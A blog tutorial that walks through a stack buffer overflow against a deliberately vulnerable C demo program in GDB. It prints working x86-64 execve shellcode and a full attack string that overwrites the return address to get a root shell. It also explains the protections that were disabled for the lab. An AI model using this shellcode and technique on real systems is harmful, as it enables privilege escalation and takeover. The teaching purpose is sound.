Tallan Blog

Exploring Buffer Overflows in C, Part Two: The Exploit

Welcome to part two of Exploring Buffer Overflows in C! If you have not read the previous article, I highly recommend doing so before going any further. In this post, I will walk you through a simplified version of a buffer overflow exploit, drawing heavily on the vocabulary and theory discussed in the last post. You can find Part One on Tallan’s Blog here. It would also be helpful to be familiar with hexadecimal numbers, which you can read about here. With that out of the way, let’s get to hacking.

Before We Begin

Before we can start we have to pick a target. Several methods exist to detect potential buffer overflows, ranging from manually reading the code to automated testing. Assuming you do have the source code of a program, searching for insecure functions in the C standard library is a basic, but excellent, starting point. Functions like strcat() and strcpy() do not check the length of the input strings relative to the size of the destination buffer – exactly the condition we are looking to exploit. Safe usage of these functions relies entirely upon the programmer’s implementation.

Acquiring the source code for multiple programs and combing through it for vulnerabilities can be tedious. For the sake of time, sanity, and copyright protection, we’ll be attacking a basic program made for this demo. Check out the source code for overflow.c below:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void vulnerableFunc(char* input) {
    char buffer[80];
    strcpy(buffer, input);
}

int main(int argc, char** argv) {
    if (argc != 2) {
        printf("Arguments: <buffer input>\n");
        exit(1);
    }

    vulnerableFunc(argv[1]);

    printf("Exiting...\n");
    exit(0);
}

The program takes one argument and passes it into vulnerableFunc(), which creates a buffer and copies the argument into it. Then the program prints “Exiting…” and quits. It’s not an exciting (or useful) program but it sure is insecure! The call to strcpy() on line 7 is what we are going to be exploiting – notice how the developer didn’t check the length of what was being copied into buffer.

I mentioned earlier that this example is going to be heavily simplified compared to a real-world exploit. Most operating systems and compilers have certain features enabled by default to prevent buffer overflows. Disabling security features on your regular computer is usually a Pretty Bad Idea, so I’ll be doing this demo in a Docker container running a 64-bit Ubuntu image. Towards the end of the post, I will go into more detail about the environment setup and some of the features designed to prevent these exploits.

What are we going to do tonight, Brain?

Before we start blindly throwing ourselves at the problem, let’s establish a game plan. If you remember from Part One: we want to fill the buffer with some malicious code, overflow past the end of the buffer, and overwrite the return address for the current function so it points back to the buffer (and therefore our code). We can break this down into a few steps:

  1. Find the size of the buffer
  2. Find the address of the buffer
  3. Find the return address
  4. Replace the return address with the buffer’s address
  5. Fill the buffer with malicious code
  6. Exploit!

The good news is we are already making progress – we know the size of the buffer by looking at the source code! buffer is defined as a char array of size 80. Step one was pretty easy, how hard can the rest be?

Poke it with a stick

We have to start somewhere. Let’s see what happens when you run the program normally. I’m going to use a sequence of A’s as our argument. At this point, the argument doesn’t really matter, but having a repeating character will be helpful. You’ll see why shortly. We’ll run the program twice, once with fewer than 80 A’s and once with more.

[Image: AAA Function]

The first execution went as expected: we see “Exiting…” printed to the console. But the second execution crashed and printed “Segmentation fault”. Normally not a great sign when coding, but this is good news for us! A segmentation fault is an error raised when a program tries to access memory it is not allowed to touch. The only thing that changed between the first and second call to overflow was our input – clearly something happened the second time around that caused our program to try to access off-limits memory. In order to figure out what is going on, we’re going to have to take a brief look at debugging C code with the GNU Debugger (GDB).

GNU territory

If you are unfamiliar with GDB the remainder of this article will probably seem pretty intimidating. I promise it’s not nearly as scary and alien as it seems – GDB is a debugger like any other. We will be setting breakpoints, viewing the contents of variables, and stepping through the code line by line like we are used to, only without a pretty user interface. Let’s start by displaying vulnerableFunc() and setting some breakpoints.

[Image: vulnerablefunc break points]

We’re going to stop at line 7 and line 8, immediately before and immediately after we copy our input into the buffer. Let’s run our program in GDB with “AAAA” as our input. We’ll stop just before we copy anything into buffer so we can look at the contents.

[Image: AAAA Function Contents]

Alright, let’s take this bit by bit. We ran our program in GDB with run AAAA, which then hit our first breakpoint on line 7. The second command, x /128bx buffer, displays 128 bytes as hexadecimal values, starting where buffer is stored in memory. The leftmost column shows the memory address of the first byte in each row. So in our example, buffer starts at memory address 0x7fffffffe600 and the first eight bytes are 0x00. Let’s see what happens after the call to strcpy(). The continue command will resume the program so we can get to the next breakpoint.

[Image: Next Break Point]

We have data! The first four values of buffer are now 0x41. It might seem like nothing, but 0x41 is how the ASCII character A is represented as a hexadecimal value. Our buffer is starting to fill up. We know from looking at the source code that buffer is an array of 80 characters. Each character is a byte, so we should be able to fill up 80 bytes with no issues. Let’s run the program again, this time with 80 A’s, and see what our memory looks like after strcpy() returns.

[Image: strcpy return]

Hopefully, it makes a little sense why the only input we are giving is a sequence of A’s. It makes it pretty obvious in memory! It looks like buffer starts at address 0x7fffffffe5c0 and ends at address 0x7fffffffe610, which is 80 bytes away. These addresses may change when we run the program, but that won’t be a problem. At the moment, we aren’t concerned with where certain values are stored, we want to know the distance between those values. No matter where our buffer is stored, it will always end 80 bytes later.

If everything above the purple line is our buffer, what is stored below the line? We know that we want to make our buffer overflow so we can overwrite the data there, but what is it exactly? This is where the concept of stack frames is important. If you remember from last time, the stack frame holds some data about where our function was called from, the arguments, and the return address. The goal is to overwrite the return address so we can control what the program does next. GDB makes this very easy with the info frame command. Let’s run the program again (using our 80 A’s) and see what information we can gather. The Docker container is running a 64-bit (x86-64) version of Ubuntu, where the instruction pointer is kept in a register called rip.

[Image: rip Value]

Look at that! GDB not only tells us the saved value of rip, which is the return address (0x55555555472a), but it also tells us where that value is stored in memory (0x7fffffffe618). But where is this relative to buffer?

[Image: Buffer and return address]

We see buffer at address 0x7fffffffe5c0 and we see the return address at 0x7fffffffe618, just as GDB promised. Notice how the bytes of the address in memory are in the reverse order from how GDB displays it. The computer I’m using uses little-endian byte order, which, super simplified, means a multi-byte value is stored with its least significant byte first. Don’t focus too much on what that really means, just remember that the bytes of an address appear reversed when you look at them in memory.

Looks like the address of buffer changed since the last time we ran the program! The good news is that the return address will always be the same distance from the end of the buffer. Doing some hexadecimal math:

0xe618 - 0xe5c0 = 0x58 = 88 (decimal)

Finding the difference between the addresses and converting it to decimal tells us that the return address is stored 88 bytes after the start of buffer. Since buffer has 80 bytes allocated for it, the remaining 8 bytes sit between the end of buffer and the return address, and our overflow has to fill them as well. On 64-bit operating systems, memory addresses use 64 bits (8 bytes). If we provide 96 characters, we fill the buffer (80 bytes), cover the 8-byte gap, and then overwrite the entire 8-byte return address. Let’s look at the buffer when we copy in 96 A’s.

[Image: 96 As]

info frame shows us that the return address is stored at 0x7fffffffe608, but look what’s in memory! We successfully overwrote the return address. When our function ends, the program will look to 0x7fffffffe608 to find which instruction to execute next. But instead of the original location, it will try and go to 0x4141414141414141. The odds of there being anything useful in that location are pretty small. We’ll change the return address to be equal to the address of the buffer so we can provide our own code to run.

Return to sender

We have our sequence of 96 A’s where the last 8 replace the return address stored on the stack. We need to change those 8 bytes to be the address of buffer. If the address of buffer is 0x7fffffffe5b0, we need to split that into individual bytes, reverse them (little-endian byte order!), and put them inside the argument. One tricky thing to note: GDB omits leading zeros when it prints memory addresses. Our address is only twelve hexadecimal digits, which is only six bytes. Since memory addresses on this computer are really 8 bytes long, we’ll add the missing zeros to make sure our address works.

0x00007fffffffe5b0
0x00 0x00 0x7f 0xff 0xff 0xff 0xe5 0xb0
0xb0 0xe5 0xff 0xff 0xff 0x7f 0x00 0x00
\xb0\xe5\xff\xff\xff\x7f\x00\x00

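Writing a byte as “\x” followed by two hexadecimal digits tells whatever expands the string (a shell’s printf or a scripting language, for example) to emit the raw byte with that value instead of the literal ASCII characters. For example, \x41 becomes the single byte 0x41 (the letter A), whereas typing 41 would store the two characters “4” and “1”. Our input string now looks like this: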

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xb0\xe5\xff\xff\xff\x7f\x00\x00

Let’s check if this successfully replaced the return address:

[Image: Replace Return Address]

The memory address where the instruction pointer was stored now holds the reversed address of buffer, perfect! When our function finishes, the program will jump to our buffer to try and find the next instructions to execute, but “AAAAAAAA” is hardly a useful instruction. We’ll build our malicious code next.

Shellcode

The malicious code we are inserting into the buffer has one goal – to open a shell for us. Thus the creative name “shellcode” was born. Unix-like systems offer several functions for launching programs, but we’re going to focus on execve(). It takes three arguments: the path to a program, an array of arguments to pass to that program, and an array of environment settings. Using this information, it replaces the currently running process with whatever program you tell it to run. This means that everything after a successful call to execve() doesn’t happen! It is completely replaced in memory. Look at the example code below.

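#include <stdio.h>
#include <unistd.h>

int main(void)
{
    /* argv[0] is the program to run; both arrays must end with NULL */
    char* argv[] = {"/bin/sh", NULL};
    char* env[] = {"FLAG=1", NULL};
    execve(argv[0], argv, env);
    /* Only reached if execve() fails; on success this process is replaced */
    printf("execve failed\n");
    return 1;
}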

Now, let’s build this code and see what it does:

[Image: shellcode]

Immediately after running the program an empty line with a “#” prompt appears. This is the new shell! It is no different from the shell we were just using to run our program. When we then exit this shell, we are put right back to where we were when we originally ran our shellcode. Notice how we don’t see “execve failed” printed to the console anywhere – that line was replaced with the successful call to execve(). This is the function we are going to use to hijack the vulnerable program.

Some assembly required

Unfortunately, it is not quite as simple as copying and pasting our code into the program’s input – we need the instructions in a form the processor can understand. When compiling code, there is an intermediate step between human-readable text and an executable program where we can view the actual machine code.

There are two issues with this, however. The first: the steps to find these instructions are different for each compiler. This makes it difficult to write a good walkthrough! The second issue: our code is not optimized to take up as little space as possible. The instructions for the example shellcode took up a few hundred bytes of memory, way more than our buffer could hold. We’ll solve both of these problems as only programmers could – looking online! The website shell-storm is run by a security researcher who has compiled several versions of shellcodes that have been optimized for buffer overflows. I’ll be using the 27-byte version found here. The instructions, when converted into hexadecimal characters, look like this:

\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05

Now we have to update our attack string so that the program can find our instructions when it tries to read our buffer! Our attack string currently looks like this:

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xb0\xe5\xff\xff\xff\x7f\x00\x00

We need to make sure the total size of our string remains the same so the return address is overwritten. If we’re going to prepend 27 bytes we need to remove 27 A’s. The final attack string looks like this:

\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xb0\xe5\xff\xff\xff\x7f\x00\x00
 

Running the program one more time:

[Image: Return points to buffer]

We can see that the code was inserted right where buffer begins and our return address points to buffer. All that is left is to see if it works!

The same thing we do every night Pinky – try to take over the world!

Running the whoami command will print out your username. On this machine, the account being used is subtly named “hacker”. Let’s run the program one more time and see what happens.

[Image: success]

I started off as “hacker”, ran the program, and now I have a shell open as the root user! It may not look like much, but it opens up many possibilities to the prepared hacker. None of the famous buffer overflow exploits mentioned in the last article were only buffer overflows – that was just the way in. From here we could install a keylogger, steal data on the server, or start sending out really annoying spam emails!

Pay no attention to that man behind the curtain.

Now if you’re sitting there thinking “wow you can teach someone to hack after one blog post, nothing is safe,” let me address some of your concerns and show you what I have been hiding behind the scenes. In short, this won’t work easily on a normal computer. There are a variety of security features I disabled when preparing this demo.

When I ran the Docker image, I needed to provide two flags: --privileged, to give the container full access to the host machine’s devices and memory, and --security-opt seccomp=unconfined, to turn off the default seccomp profile that restricts which system calls the container can make. Once the container started, I had to disable an operating system feature named Address Space Layout Randomization, or ASLR. ASLR lets the operating system randomize where a program’s code and data, including its stack, are placed in memory. Remember how the address of buffer slightly changed at one point? With ASLR enabled, it would have changed unpredictably each time we ran the program, making it much more difficult to successfully change the return address.

I also had to pass options to the compiler to disable some protections that it enables by default. The first was -z execstack, which marks the stack as executable so the program can run instructions found there. Without it, our program would crash even if we used the correct attack string – it wouldn’t have been able to execute the shellcode. The second was -fno-stack-protector, which turns off the stack protector. That feature detects overflows on the stack by placing a hidden, randomized value (often called a canary) in the stack frame when a function starts and checking it again just before the function returns. If this value has changed in between, the program knows an overflow occurred and aborts instead of returning to an address it can no longer trust.

End of the line

We’ve gone from pure theory to a basic, working exploit in two blog posts. Buffer overflows may not be the most pressing security issue in 2019, but they do happen and they are not that difficult to exploit. Programmers have come up with solutions at the operating system and the compiler level, but the only surefire way to safeguard against buffer overflows (and most vulnerabilities) comes down to safe coding practices. A single if statement to make sure that the buffer is big enough would make this attack impossible.

The moral of the story? Never trust user input!

